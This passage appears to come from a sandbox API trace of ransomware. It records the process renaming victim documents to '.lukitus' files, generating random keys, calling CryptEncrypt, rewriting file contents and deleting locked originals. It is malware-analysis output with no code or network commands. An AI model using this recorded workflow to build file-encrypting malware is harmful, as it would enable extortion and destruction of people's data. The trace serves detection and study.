lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0106.542] FlushFileBuffers (hFile=0x328) returned 1 [0106.545] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\86HHW2XyBUJyZf.xlsx" (normalized: "c:\\users\\aetadzjz\\documents\\86hhw2xybujyzf.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ee09720, ftCreationTime.dwHighDateTime=0x1d313b9, ftLastAccessTime.dwLowDateTime=0x7a38c3b0, ftLastAccessTime.dwHighDateTime=0x1d31486, ftLastWriteTime.dwLowDateTime=0x7a38c3b0, ftLastWriteTime.dwHighDateTime=0x1d31486, nFileSizeHigh=0x0, nFileSizeLow=0x127bd)) returned 1 [0106.545] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.545] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.545] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.545] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.545] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.545] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.545] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.545] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.545] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.545] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.545] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.545] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.545] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.545] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.545] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.545] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.546] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.546] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.546] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.546] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0106.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0106.546] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\86HHW2XyBUJyZf.xlsx" (normalized: "c:\\users\\aetadzjz\\documents\\86hhw2xybujyzf.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0106.546] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\86HHW2XyBUJyZf.xlsx" (normalized: "c:\\users\\aetadzjz\\documents\\86hhw2xybujyzf.xlsx"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\F56924BE-9663-41BB-02DDBB2E-DDA7EEF606E5.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\f56924be-9663-41bb-02ddbb2e-dda7eef606e5.lukitus"), dwFlags=0x9) returned 1 [0106.548] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0106.548] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0106.553] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x127bd, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x127bd, lpOverlapped=0x0) returned 1 [0106.554] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0106.554] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x127bd, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x127bd, lpOverlapped=0x0) returned 1 [0106.554] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0106.555] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x6388a090, dwHighDateTime=0x1d31760)) [0106.555] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0106.555] FlushFileBuffers (hFile=0x328) returned 1 [0106.559] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\098073.doc" (normalized: "c:\\users\\aetadzjz\\desktop\\098073.doc"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcab4fa70, ftCreationTime.dwHighDateTime=0x1d30621, ftLastAccessTime.dwLowDateTime=0xcab4fa70, ftLastAccessTime.dwHighDateTime=0x1d30621, ftLastWriteTime.dwLowDateTime=0x3e17fb00, ftLastWriteTime.dwHighDateTime=0x1d3175e, nFileSizeHigh=0x0, nFileSizeLow=0xc1d6)) returned 1 [0106.559] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.559] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.559] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.559] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.559] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.559] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.559] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.559] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.559] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.559] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.559] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.559] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.559] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.559] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.559] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.559] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.559] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.559] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.559] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.559] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0106.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0106.559] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\098073.doc" (normalized: "c:\\users\\aetadzjz\\desktop\\098073.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0106.559] GetLastError () returned 0x20 [0106.559] RaiseException (dwExceptionCode=0xe06d7363, dwExceptionFlags=0x1, nNumberOfArguments=0x3, lpArguments=0x281f558) [0106.560] GetLastError () returned 0x20 [0106.560] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x751d0000 [0106.562] GetCurrentThreadId () returned 0x880 [0106.562] SetLastError (dwErrCode=0x20) [0106.562] RtlUnwind (TargetFrame=0x281fcac, TargetIp=0x40148b, ExceptionRecord=0x281f028, ReturnValue=0x0) [0106.562] GetLastError () returned 0x20 [0106.562] SetLastError (dwErrCode=0x20) [0106.562] GetLastError () returned 0x20 [0106.562] SetLastError (dwErrCode=0x20) [0106.562] GetLastError () returned 0x20 [0106.562] SetLastError (dwErrCode=0x20) [0106.562] GetLastError () returned 0x20 [0106.562] SetLastError (dwErrCode=0x20) [0106.562] GetLastError () returned 0x20 [0106.562] SetLastError (dwErrCode=0x20) [0106.562] GetLastError () returned 0x20 [0106.562] SetLastError (dwErrCode=0x20) [0106.562] GetLastError () returned 0x20 [0106.562] SetLastError (dwErrCode=0x20) [0106.562] GetLastError () returned 0x20 [0106.562] SetLastError (dwErrCode=0x20) [0106.562] GetLastError () returned 0x20 [0106.562] SetLastError (dwErrCode=0x20) [0106.562] GetLastError () returned 0x20 [0106.562] SetLastError (dwErrCode=0x20) [0106.562] GetLastError () returned 0x20 [0106.562] SetLastError (dwErrCode=0x20) [0106.562] GetLastError () returned 0x20 [0106.562] SetLastError (dwErrCode=0x20) [0106.562] GetLastError () returned 0x20 [0106.563] SetLastError (dwErrCode=0x20) [0106.563] GetLastError () returned 0x20 [0106.563] SetLastError (dwErrCode=0x20) [0106.563] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\098073.doc" (normalized: "c:\\users\\aetadzjz\\desktop\\098073.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x328 [0106.563] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\F56924BE-9663-41BB-93FF195C-3BB52D679DDB.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\f56924be-9663-41bb-93ff195c-3bb52d679ddb.lukitus"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x324 [0106.564] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0106.564] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0106.569] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xc1d6, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xc1d6, lpOverlapped=0x0) returned 1 [0106.570] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xc1d6, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xc1d6, lpOverlapped=0x0) returned 1 [0106.571] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0106.571] FlushFileBuffers (hFile=0x324) returned 1 [0106.586] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\098073.doc" (normalized: "c:\\users\\aetadzjz\\desktop\\098073.doc"), dwDesiredAccess=0x40000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0106.586] GetLastError () returned 0x20 [0106.586] RaiseException (dwExceptionCode=0xe06d7363, dwExceptionFlags=0x1, nNumberOfArguments=0x3, lpArguments=0x281f468) [0106.586] GetLastError () returned 0x20 [0106.586] SetLastError (dwErrCode=0x20) [0106.586] RtlUnwind (TargetFrame=0x281f584, TargetIp=0x40148b, ExceptionRecord=0x281ef38, ReturnValue=0x0) [0106.586] GetLastError () returned 0x20 [0106.586] SetLastError (dwErrCode=0x20) [0106.586] GetLastError () returned 0x20 [0106.586] SetLastError (dwErrCode=0x20) [0106.587] GetLastError () returned 0x20 [0106.587] SetLastError (dwErrCode=0x20) [0106.587] GetLastError () returned 0x20 [0106.587] SetLastError (dwErrCode=0x20) [0106.587] GetLastError () returned 0x20 [0106.587] SetLastError (dwErrCode=0x20) [0106.587] GetLastError () returned 0x20 [0106.587] SetLastError (dwErrCode=0x20) [0106.587] GetLastError () returned 0x20 [0106.587] SetLastError (dwErrCode=0x20) [0106.587] GetLastError () returned 0x20 [0106.587] SetLastError (dwErrCode=0x20) [0106.587] GetLastError () returned 0x20 [0106.587] SetLastError (dwErrCode=0x20) [0106.587] GetLastError () returned 0x20 [0106.587] SetLastError (dwErrCode=0x20) [0106.587] GetLastError () returned 0x20 [0106.587] SetLastError (dwErrCode=0x20) [0106.587] GetLastError () returned 0x20 [0106.587] SetLastError (dwErrCode=0x20) [0106.587] GetLastError () returned 0x20 [0106.587] SetLastError (dwErrCode=0x20) [0106.587] GetLastError () returned 0x20 [0106.587] SetLastError (dwErrCode=0x20) [0106.587] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0106.587] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0106.587] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0106.587] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0106.587] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0106.587] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0106.587] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0106.587] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0106.587] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0106.587] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0106.588] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0106.588] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0106.588] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0106.588] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0106.588] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0106.588] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0106.588] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0106.588] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0106.588] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0106.588] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0106.588] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0106.588] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0106.588] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0106.588] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0106.588] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0106.588] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0106.588] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0106.588] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0106.588] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0106.588] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0106.588] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0106.588] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0106.588] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\098073.doc" (normalized: "c:\\users\\aetadzjz\\desktop\\098073.doc"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\0619171273D7A52EB51EE135D94A8C63.tmp" (normalized: "c:\\users\\aetadzjz\\desktop\\0619171273d7a52eb51ee135d94a8c63.tmp"), dwFlags=0x8) returned 0 [0106.588] DeleteFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\098073.doc" (normalized: "c:\\users\\aetadzjz\\desktop\\098073.doc")) returned 0 [0106.588] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\0CA4J37R3gLfIG x-yY.odt" (normalized: "c:\\users\\aetadzjz\\desktop\\0ca4j37r3glfig x-yy.odt"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ebf9370, ftCreationTime.dwHighDateTime=0x1d2f905, ftLastAccessTime.dwLowDateTime=0x6f2e7ee0, ftLastAccessTime.dwHighDateTime=0x1d2f9e9, ftLastWriteTime.dwLowDateTime=0x6f2e7ee0, ftLastWriteTime.dwHighDateTime=0x1d2f9e9, nFileSizeHigh=0x0, nFileSizeLow=0x13b7b)) returned 1 [0106.588] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.589] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.589] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.589] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.589] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.589] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.589] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.589] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.589] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.589] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.589] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.589] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.589] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.589] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.589] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.589] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.589] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.589] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.589] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.589] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0106.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0106.589] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\0CA4J37R3gLfIG x-yY.odt" (normalized: "c:\\users\\aetadzjz\\desktop\\0ca4j37r3glfig x-yy.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0106.589] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\0CA4J37R3gLfIG x-yY.odt" (normalized: "c:\\users\\aetadzjz\\desktop\\0ca4j37r3glfig x-yy.odt"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\F56924BE-9663-41BB-DD1F464E-1D4279836981.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\f56924be-9663-41bb-dd1f464e-1d4279836981.lukitus"), dwFlags=0x9) returned 1 [0106.591] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0106.591] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0106.598] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x13b7b, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x13b7b, lpOverlapped=0x0) returned 1 [0106.599] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0106.599] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x13b7b, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x13b7b, lpOverlapped=0x0) returned 1 [0106.600] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0106.600] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x638fc4b0, dwHighDateTime=0x1d31760)) [0106.600] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0106.600] FlushFileBuffers (hFile=0x324) returned 1 [0106.604] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\0Q64daekSd8g.xlsx" (normalized: "c:\\users\\aetadzjz\\desktop\\0q64daeksd8g.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a499260, ftCreationTime.dwHighDateTime=0x1d305c7, ftLastAccessTime.dwLowDateTime=0x1d497260, ftLastAccessTime.dwHighDateTime=0x1d30533, ftLastWriteTime.dwLowDateTime=0x1d497260, ftLastWriteTime.dwHighDateTime=0x1d30533, nFileSizeHigh=0x0, nFileSizeLow=0x17554)) returned 1 [0106.604] CryptGenRandom (in: hProv=0x606b98, 